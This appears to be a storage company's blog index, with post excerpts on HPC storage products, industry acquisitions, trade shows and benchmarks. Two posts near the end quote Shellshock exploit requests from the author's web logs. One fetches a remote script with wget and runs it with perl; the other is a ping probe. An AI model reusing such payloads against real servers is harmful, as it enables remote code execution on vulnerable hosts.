That is, 5+ million IOPS. The price point for this is $50k for 48TB, about $1/GB. Pre-order now, shipping in a few weeks.
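A quick sanity check ties the random-IO and pricing figures together. This sketch assumes "4kB" means 4096 bytes and that TB and GB are decimal units (1 TB = 1000 GB):

```python
def iops_to_bytes_per_s(iops, block_bytes):
    """Bandwidth implied by a random-IO rate at a fixed block size."""
    return iops * block_bytes


def dollars_per_gb(price_usd, capacity_tb):
    """Price per decimal GB (1 TB = 1000 GB)."""
    return price_usd / (capacity_tb * 1000)


if __name__ == "__main__":
    bw = iops_to_bytes_per_s(5_000_000, 4096)   # 5M IOPS at 4 KiB
    print(f"{bw / 1e9:.2f} GB/s")               # decimal GB
    print(f"${dollars_per_gb(50_000, 48):.2f}/GB")
```

5 million 4 KiB reads per second moves about 20.5 GB/s, roughly the same as the 20+ GB/s streaming figure. $50k for 48TB works out to about $1.04/GB.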
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, I saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Moving inventory out to make room for new stuff
We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some … the team are building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Just give me a huge fast storage system, and a mighty network to delivery it by
A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days … this would not be a win.
Posts
Looking forward to showing off a new product at SC15
Think … pretty interesting performance … Think very … very dense … Think … there may be some benchies leaked here soon.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
Finding needles in haystacks covered in a fallen down barn
Ok … this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems … the interrupt handler catches an exception, and then you start piling up softirq contexts. It’s on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can’t assign blame for this as I don’t know who is at fault.
Posts
M&A: EMC gobbled by Dell
Need to think about how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem raised by Elliott Management (i.e. they wanted more return on their investment). As part of increasing the return to shareholders, EMC had been in cost-cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
The end of java in the browser
Coming soon. Mozilla is turning off NPAPI support at the end of next year. The Java plugin and Java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow Flash. Which is less good. What is interesting about this is that it sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM-like capabilities.
Posts
End days must be on hand ... Perl 6 is out
see for more details. I’d love to find a valid reason to play with it, but my near term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over … as the correct response has been “what year”. Until this year it seems.
Posts
M&A: Cleversafe is snarfed up by IBM
Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won’t be alone for long.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Inventory to sell to make room: Cadence and several Unison/JackRabbits
Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We’ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for …
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We’ve got the portable petabyte unit available (albeit with less than 1 PB).
Posts
Unison Ceph beats reference architecture, including the flavor with NVMe drives
The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
What’s really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don’t help much in the tests. This is not to say NVMe is bad; it’s not.
Posts
Nominate your favorite HPC product and company for a readers choice award
Please go here and nominate! Last year, our customer Lucera won Best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don’t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product or Technology for the Scalable Informatics Unison product, or whatever you’d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive Computing.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits, is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
IPO: Pure Storage files
Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in decline, and depending upon how you view it, it’s either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Build debugging thoughts
The toolchain that we use to provide up-to-date and bug-reduced versions of various tools for our appliances has a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are run right then and there, as part of the module installation. Sadly, not many languages do this yet; I think Julia, R, and a few others might.
Posts
Insanely awesome project and product
This is one of Scalable Informatics FastPath Unison systems, well the bottom part. The top are clients we are using to test with.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U unit with 54 physical 2.5 inch 6Gb/s or 12Gb/s SAS or SATA SSDs. We have 5 of these units in the picture, and a number of SSDs on the way to fill them up. Think 0.2PB of usable flash.
Posts
Playing "guess which wire I just pulled" isn't fun
Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. It’s hard to maintain an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?) suddenly disappears on you.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Tools for linux devops: lsbond.pl
Slowly but surely, I am scratching the itches I’ve had for a while with regard to data extraction from a running system. One of the big issues I deal with all the time is extracting the state and components (and their states) of a Linux network bond. It’s an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0: mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.
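lsbond.pl itself isn’t shown here. As a rough sketch of just the `/proc/net/bonding` part, the Python below splits the driver’s "Key: value" output into bond-level and per-slave sections and prints a one-line summary modeled on the output above. The MAC and IPv4 details come from /sys/class/net and ip, and this sketch leaves them out. The key names match what the Linux bonding driver prints, but the exact set varies with kernel version and bonding mode, so missing keys fall back to `?`.

```python
import glob
import os


def parse_bonding(text):
    """Split /proc/net/bonding/<bond> into bond-level and per-slave dicts.

    Lines look like "Key: value"; every "Slave Interface:" line starts a
    new slave section, and everything before the first one is bond-level.
    """
    bond, slaves, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if ": " not in line:
            continue  # blank lines and section headers without values
        key, value = line.split(": ", 1)
        if key == "Slave Interface":
            current = {"name": value}
            slaves.append(current)
        elif current is None:
            bond[key] = value
        else:
            current[key] = value
    return bond, slaves


def summarize(name, text):
    """One summary line for the bond, then one indented line per slave."""
    bond, slaves = parse_bonding(text)
    parts = [f"{name}: state {bond.get('MII Status', '?')}",
             f"mode {bond.get('Bonding Mode', '?')}"]
    if "Transmit Hash Policy" in bond:
        parts.append(f"xmit_hash {bond['Transmit Hash Policy']}")
    parts.append(f"polling {bond.get('MII Polling Interval (ms)', '?')} ms")
    parts.append(f"up_delay {bond.get('Up Delay (ms)', '?')} ms")
    parts.append(f"down_delay {bond.get('Down Delay (ms)', '?')} ms")
    out = [" ".join(parts)]
    for s in slaves:
        out.append(f"  {s['name']}: {s.get('MII Status', '?')} "
                   f"speed {s.get('Speed', '?')} hw {s.get('Permanent HW addr', '?')}")
    return "\n".join(out)


if __name__ == "__main__":
    for path in sorted(glob.glob("/proc/net/bonding/*")):
        with open(path) as f:
            print(summarize(os.path.basename(path), f.read()))
```

Splitting on the first `": "` (colon plus space) keeps MAC addresses such as `00:11:22:33:44:55` intact, since their colons are not followed by spaces.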
Posts
Day job growing
We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!
Posts
Baidu attack deflection
So Baidu’s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn’t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales and put their code on their partners’ hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, in which case it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential, that is)? Well, there are 4 basic Flash fabs out there these days.
Posts
Fixing Baidu's broken search bot
It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven’t been in use for at least 7 years. I can’t imagine this was simply a harmless bug, as much as … maybe? … a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.
Posts
Blog post title of the day ... Any Sufficiently Advanced Technology ...
I am a huge fan of Charles Stross’s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner …
Posts
Most of our traffic on the day job site now comes from Baidu
Well, their web crawler. Way, way back in the day, I complained about broken bing-bots. This was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deep in the traffic noise. Not Baidu. Their bot is, for lack of a better term, broken. It’s not at DoS levels, but it is wasting traffic/resources, and providing lots of log spam.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Portable PetaByte systems update
As a reminder, the day job has 1PB dense and fast (20GB/s and above) storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we’ve delivered all flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation for under $600k USD, as well as a 1PB flash version in 1-2 racks.
Posts
takes a licking and keeps on ticking
One of our systems at a customer site.

    $ uptime
    15:47:33 up 407 days, 3:23, 2 users, load average: 0.19, 0.10, 0.06
    $ uname -r
    3.10.36.scalable
Posts
A new thing to occupy my time
Doesn’t have to be a code golf mechanism, but this looks like fun!
Posts
Thoughts on a Thursday
We’ve been doing the startup thing for a hair under 13 years now. Most of the time we’ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we’ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.
Posts
Interesting conversation with a customer about our siRouter
They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.
Posts
Our 100GbE flash storage appliance benchmarks discussed
See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired) This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you’d like to discuss. And yes, this is the world’s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.
Posts
Day job is hiring
Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don’t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. It’s been cooking in the background for a while; as you might have noticed from my posting frequency, I’ve been busy. But we are up and running. Base distro version here:
```
root@usn-ramboot:~# df -h
Filesystem Size Used Avail Use% Mounted on
tmpfs 8.
```
Posts
Off to Chicago for The Trading Show
Looking forward to our booth #243 at the Trading Show in Chicago. We’ll have a FastPath Cadence time series analytics unit with us. Should be fun!
Posts
M&A: Avago grabbed Broadcom, Intel grabs Altera
Avago continues its acquisition spree, this time with Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there’s Intel.
Posts
Massive, Unapologetic Firepower: part 3, the network
Take the world’s fastest hyperconverged storage-compute server. Mix into this the world’s fastest networking. What do you get? (hint: something you can order today)
```
~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4
------------------------------------------------------------
Client connecting to 192.168.1.1, TCP port 5001
TCP window size: 1.00 MByte (WARNING: requested 512 KByte)
------------------------------------------------------------
[ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001
[ 4] local 192.168.1.2 port 50796 connected with 192.
```
Posts
Been heads down working very hard on something very cool
More soon. We’ll post here, with some basic results. Insanely cool stuff.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have a booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
Nebula shuts down
Nebula, a cloud “appliance” (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn’t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.
Posts
M&A: Convey snapped up by Micron
Rich at InsideHPC has the story. This is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given some of Micron’s other projects. The big question is, for the OEMs not going this route, or waiting to go this route, will that strategy work?
Posts
Announcement of new storage appliance
More information in our video (linked here in case the video doesn’t embed properly, you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
*We don’t do Google or other analytics (just local stuff here), so this shouldn’t be a security issue. Let us know if you believe otherwise.
Posts
M&A: Blekko grabbed by IBM for Watson
Have a look at the page. Blekko was started by a number of people including Greg Lindahl, who spent many years in the HPC world. He’s another recovering physical scientist (astronomer as I remember). This is interesting as it gives a sense as to where IBM sees its future. They aren’t (it looks to me) trying to compete with Google; rather, they are trying to add interesting capability to Watson. They see Watson and things derived from it as their future.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series and big data analytical systems. Tremendous internal bandwidth is coupled with massive internal parallelism and a minimal-latency network design. This unit has been designed to deliver the maximum performance possible in as small a footprint as possible … both in rack space and in cost. You can use these as independent stand-alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Π day has come
I like Π … apple, cherry, etc. For those who don’t get the pun, dates in the US are often written as Month/Day/Year, with the year abbreviated to 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined as the ratio of a circle’s circumference to its diameter on a 2D plane. You can extend the pun further at 9:26.
Posts
A completely unsolved problem
contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.
Posts
Scalable Informatics customer Milford Film and Animation does awesome projects
It’s nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their workloads are very compute, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.
Posts
My vote for most awesome Mac OSX software
Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk, as SanDisk bought Smart Storage, which worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an injunction, at least a temporary one, against Diablo.
Posts
New all-flash-array: SanDisk's Infiniflash
Interesting development from SanDisk. Not quite an M&A bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the specs are kind of disappointing. 7GB/s maximum and 1M IOPs.
Posts
M&A: HGST acquires Amplidata
This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices. This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point. The flip side to this is if you start competing with your customers.
Posts
M&A Avago (the LSI acquirers) just bought Emulex
Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they’ve done and grabbed Emulex. Emulex has a large FC capability, but I can’t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Hype at the speed of hype, or big data marketing and media
There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one … and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I’ve seen this, many times over my career.
Posts
Shakes head, chuckles ... yeah, we couldn't see that one coming ...
Just to get this out of the way, apart from this ideologically and politically charged debasement of real science, I am and remain firmly a “believer”* that the earth’s climate has changed, has been changing, and will continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store state of a system.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
The Interview (no, not that one!)
Rich at InsideHPC.com (you do read it daily, don’t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good … More soon … And no, we aren’t going to hack anyone
Posts
Micro, Meso, and Macro shifts
The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in market. We’ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
- 16-24 processor cores
- 128 GB RAM
- 48x {2,3,4} TB top mount drives
- 4x rear mount SSDs (OS/metadata cache)
- Scalable OS (Debian Wheezy based Linux OS)
- 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
The #PortablePetaByte : Coming to a data center near you!
As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood by introducing components with a higher probability of failure into a pathway which assumes no failure.
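The failure argument can be made concrete with a small worked equation. This is a sketch that assumes component failures are independent and that each $p_i$ is the probability that component $i$ fails over the same time window. A data path that needs all $n$ components survives with probability

$$
P_{\text{path}} = \prod_{i=1}^{n} (1 - p_i),
\qquad
P'_{\text{path}} = (1 - p_{\text{swap}})\, P_{\text{path}} \le P_{\text{path}}
$$

where $P'_{\text{path}}$ is the same path once paged-out memory also depends on a swap device with failure probability $p_{\text{swap}}$. Equality holds only if $p_{\text{swap}} = 0$, so adding the swap device to the path can never make it more reliable, and the penalty grows with $p_{\text{swap}}$.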
Posts
#sc14 T-minus 2 days and counting #HPCmatters
On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We’ll have a demo visualfx reel from a customer who uses Scalable Informatics JackRabbit, DeltaV (and, as the result of an upgrade yesterday, Unison). Looking forward to getting everything going, and it will be good to see everyone at the show!
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldy … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
turnkey, low cost and high density 1PB usable at 20+ GB/s sustained
Fully turnkey, we’d ship a rack with everything pre-installed/configured. Some de-palletizing required, but it’s plug and play (power, disks) after that. More details, and a sign up to get a formal quote here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to the BeeGFS native client.
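The two price points together imply how much raw capacity sits behind the usable petabyte. Writing $C$ for the system price, $R$ for raw GB and $U$ for usable GB, and treating the quoted USD 0.18 and USD 0.26 figures as the actual prices (they are stated as upper bounds, so this is approximate):

$$
\frac{U}{R} = \frac{C/R}{C/U} \approx \frac{0.18}{0.26} \approx 0.69,
\qquad
C \approx 0.26\ \tfrac{\text{USD}}{\text{GB}} \times 10^{6}\ \text{GB} \approx 2.6 \times 10^{5}\ \text{USD}
$$

That is, roughly 69% of raw capacity ends up usable, or about 1.44 PB raw behind 1 PB usable (assuming decimal units, 1 PB = $10^6$ GB).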
Posts
Velocity matters
For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years.
Posts
A good read on a bootstrapped company
Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
If you don’t start with building a real company, you won’t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if it’s someone else’s ass, and money for that matter.
Posts
There are times
… when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves: exactly why did they do this to themselves? Today was like this. We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, it’s a metaphor. Today was a day of Pyrrhic victories.
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
... and the shell shock attempts continue ...
From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
That may be the fastest I've seen an exploit go from "theoretical" to "used"
Found in our web logs this afternoon. This is bash shellshock.
Request: '() {:;}; /bin/ping -c 1 104.131.0.69'
